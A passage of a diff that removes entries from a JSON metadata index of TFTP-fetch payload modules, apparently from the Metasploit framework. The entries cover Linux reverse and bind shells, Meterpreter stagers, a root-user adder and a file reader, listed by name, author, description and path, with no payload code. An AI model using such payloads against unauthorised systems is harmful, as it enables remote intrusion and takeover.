- "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell_bind_tcp_random_port", - "staged": false - }, - "payload_cmd/linux/tftp/x64/shell_find_port": { - "name": "TFTP Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/tftp/x64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "mak" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell_find_port", - "staged": false - }, - "payload_cmd/linux/tftp/x64/shell_reverse_ipv6_tcp": { - "name": "TFTP Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/tftp/x64/shell_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "epi " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell_reverse_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x64/shell_reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x86/adduser": { - "name": "TFTP Fetch, Linux Add User", - "fullname": "payload/cmd/linux/tftp/x86/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "vlad902 ", - "spoonm " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nCreate a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/adduser", - "staged": false - }, - "payload_cmd/linux/tftp/x86/chmod": { - "name": "TFTP Fetch, Linux Chmod", - "fullname": "payload/cmd/linux/tftp/x86/chmod", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nRuns chmod on specified file with specified mode", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/chmod", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/chmod", - "staged": false - }, - "payload_cmd/linux/tftp/x86/exec": { - "name": "TFTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/tftp/x86/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "vlad902 ", - "Geyslan G. Bem " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nExecute an arbitrary command or just a /bin/sh shell", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/exec", - "staged": false - }, - "payload_cmd/linux/tftp/x86/generic/debug_trap": { - "name": "TFTP Fetch, Generic x86 Debug Trap", - "fullname": "payload/cmd/linux/tftp/x86/generic/debug_trap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "robert " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nGenerate a debug trap in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/generic/debug_trap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "generic/debug_trap", - "staged": false - }, - "payload_cmd/linux/tftp/x86/generic/tight_loop": { - "name": "TFTP Fetch, Generic x86 Tight Loop", - "fullname": "payload/cmd/linux/tftp/x86/generic/tight_loop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "jduck " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nGenerate a tight loop in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/generic/tight_loop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "generic/tight_loop", - "staged": false - }, - "payload_cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp": { - "name": "TFTP Fetch, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid": { - "name": "TFTP Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp": { - "name": "TFTP Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/bind_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_cmd/linux/tftp/x86/meterpreter/bind_tcp": { - "name": "TFTP Fetch, Bind TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid": { - "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_cmd/linux/tftp/x86/meterpreter/find_tag": { - "name": "TFTP Fetch, Find Tag Stager", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nUse an established connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/find_tag", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/find_tag" - }, - "payload_cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_cmd/linux/tftp/x86/meterpreter/reverse_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "tkmru" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_cmd/linux/tftp/x86/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/x86/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/x86/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x86/metsvc_bind_tcp": { - "name": "TFTP Fetch, Linux Meterpreter Service, Bind TCP", - "fullname": "payload/cmd/linux/tftp/x86/metsvc_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hdm " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/metsvc_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/metsvc_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x86/metsvc_reverse_tcp": { - "name": "TFTP Fetch, Linux Meterpreter Service, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/x86/metsvc_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hdm " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/metsvc_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/metsvc_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x86/read_file": { - "name": "TFTP Fetch, Linux Read File", - "fullname": "payload/cmd/linux/tftp/x86/read_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hal" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nRead up to 4096 bytes from the local file system and write it back out to the specified file descriptor", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/read_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/read_file", - "staged": false - }, - "payload_cmd/linux/tftp/x86/shell/bind_ipv6_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid": { - "name": "TFTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_cmd/linux/tftp/x86/shell/bind_nonx_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/shell/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/bind_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_cmd/linux/tftp/x86/shell/bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from a TFTP 